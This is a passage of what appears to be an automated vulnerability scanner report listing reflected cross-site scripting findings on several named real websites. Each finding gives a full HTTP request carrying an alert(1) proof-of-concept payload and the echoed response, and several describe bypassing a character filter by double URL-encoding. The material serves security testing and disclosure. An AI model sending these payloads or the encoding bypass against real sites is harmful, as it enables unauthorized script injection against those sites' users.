GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93787cd"><script>alert(1)</script>b71538a521f&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93787cd"><script>alert(1)</script>b71538a521f&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgI
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19c30"><script>alert(1)</script>7f964332a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?19c30"><script>alert(1)</script>7f964332a49=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:33:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&19c30"><script>alert(1)</script>7f964332a49=1" type="text/css" media="all" />
...[SNIP]...

2.40. http://research.scottrade.com/services/modules/smarttext/smarttext.asp [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.scottrade.com
Path:   /services/modules/smarttext/smarttext.asp

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b22'%3balert(1)//5403540c11a was submitted in the click parameter. This input was echoed as c3b22';alert(1)//5403540c11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/modules/smarttext/smarttext.asp?click=//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.80.js.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1dc3b22'%3balert(1)//5403540c11a&symbol=&issue_type=&scode=&name=&wsodissue=&recent= HTTP/1.1
Host: research.scottrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 12 Jan 2011 03:49:01 GMT
Content-Length: 8768
Content-Type: text/html
Expires: Wed, 12 Jan 2011 03:09:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Scottrade - $7 Online Trades</title>
<meta content="text/
...[SNIP]...
trade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.80.oob.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1dc3b22';alert(1)//5403540c11a';
   if (oobClick) {
       ioob.src = oobClick+'&'+rand;
   }
}

function wclick(group,elementid,e) {
   if (typeof _wclick == 'function') {
       _wclick(group,elementid,e);
   }
}

document.onclick = cm
...[SNIP]...

2.41. http://research.scottrade.com/services/modules/smarttext/smarttext.asp [recent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.scottrade.com
Path:   /services/modules/smarttext/smarttext.asp

Issue detail

The value of the recent request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6ece'%3balert(1)//3b6b1ee43c4 was submitted in the recent parameter. This input was echoed as a6ece';alert(1)//3b6b1ee43c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/modules/smarttext/smarttext.asp?click=//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.80.js.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1d&symbol=&issue_type=&scode=&name=&wsodissue=&recent=a6ece'%3balert(1)//3b6b1ee43c4 HTTP/1.1
Host: research.scottrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 12 Jan 2011 03:49:02 GMT
Content-Length: 5506
Content-Type: text/html
Expires: Wed, 12 Jan 2011 03:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Scottrade - $7 Online Trades</title>
<meta content="text/
...[SNIP]...
type="text/javascript" language="javascript">

module_class = function() {

   $('.recentSymbol').bind('click', function() {

       var data = {}
           data['wsodissue'] = this.id;
           data['recent'] = 'a6ece';alert(1)//3b6b1ee43c4';
           data['duration'] = $('#duration').val();
           data['analysis'] = $('#analysis').val();
       
       $.ajax({
           url: 'smarttext_buffer.asp',
           contentType: "html",
           data: data,
           dataType: 'htm
...[SNIP]...

2.42. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b449%2522%253balert%25281%2529%252f%252f40f9bc428e4 was submitted in the REST URL parameter 2. This input was echoed as 8b449";alert(1)//40f9bc428e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b08b449%2522%253balert%25281%2529%252f%252f40f9bc428e4/21.0.js.395x165/1294800542** HTTP/1.1
Host: scottrade.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; piba_8_22=1; i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:34:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1470

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b08b449";alert(1)//40f9bc428e4/21.0.js.395x165/1294803241**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.43. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e3f1%2522%253balert%25281%2529%252f%252f4450a534df0 was submitted in the REST URL parameter 3. This input was echoed as 2e3f1";alert(1)//4450a534df0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x1652e3f1%2522%253balert%25281%2529%252f%252f4450a534df0/1294800542** HTTP/1.1
Host: scottrade.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; piba_8_22=1; i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:34:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1470

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x1652e3f1";alert(1)//4450a534df0/1294803241**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.44. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e50d5%2522%253balert%25281%2529%252f%252f1c19e3a679b was submitted in the REST URL parameter 2. This input was echoed as e50d5";alert(1)//1c19e3a679b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0e50d5%2522%253balert%25281%2529%252f%252f1c19e3a679b/21.0.js.395x165/89518.9922535792 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:40:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1404

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0e50d5";alert(1)//1c19e3a679b/21.0.js.395x165/1294803656**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.45. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7fa6%2522%253balert%25281%2529%252f%252f6be697d218d was submitted in the REST URL parameter 3. This input was echoed as c7fa6";alert(1)//6be697d218d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165c7fa6%2522%253balert%25281%2529%252f%252f6be697d218d/89518.9922535792 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:40:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1404

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165c7fa6";alert(1)//6be697d218d/1294803659**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.46. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f619b%2522%253balert%25281%2529%252f%252fa1cc14c4492 was submitted in the REST URL parameter 2. This input was echoed as f619b";alert(1)//a1cc14c4492 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0f619b%2522%253balert%25281%2529%252f%252fa1cc14c4492/22.0.js.677x230/1294800545** HTTP/1.1
Host: scottrade.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; piba_8_22=1; i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:34:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1470

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0f619b";alert(1)//a1cc14c4492/22.0.js.677x230/1294803241**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.47. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 448df%2522%253balert%25281%2529%252f%252f73a30ef0c9a was submitted in the REST URL parameter 3. This input was echoed as 448df";alert(1)//73a30ef0c9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230448df%2522%253balert%25281%2529%252f%252f73a30ef0c9a/1294800545** HTTP/1.1
Host: scottrade.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; piba_8_22=1; i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:34:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1470

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230448df";alert(1)//73a30ef0c9a/1294803241**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.48. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa6d0%2522%253balert%25281%2529%252f%252ff32c318e866 was submitted in the REST URL parameter 2. This input was echoed as aa6d0";alert(1)//f32c318e866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0aa6d0%2522%253balert%25281%2529%252f%252ff32c318e866/22.0.js.677x230/54945.332603529096 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; i_8=7:21:84:0:0:36941:1294800543:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:41:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1404

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0aa6d0";alert(1)//f32c318e866/22.0.js.677x230/1294803666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.49. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c102%2522%253balert%25281%2529%252f%252fb24cdeebbc1 was submitted in the REST URL parameter 3. This input was echoed as 9c102";alert(1)//b24cdeebbc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x2309c102%2522%253balert%25281%2529%252f%252fb24cdeebbc1/54945.332603529096 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; i_8=7:21:84:0:0:36941:1294800543:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:41:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1404

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x2309c102";alert(1)//b24cdeebbc1/1294803668**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.50. http://www.adaptavist.com/display/~mgibson/Versions [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2f3"><img%20src%3da%20onerror%3dalert(1)>0bd872f1e4a was submitted in the REST URL parameter 3. This input was echoed as 2d2f3"><img src=a onerror=alert(1)>0bd872f1e4a in the application's response.

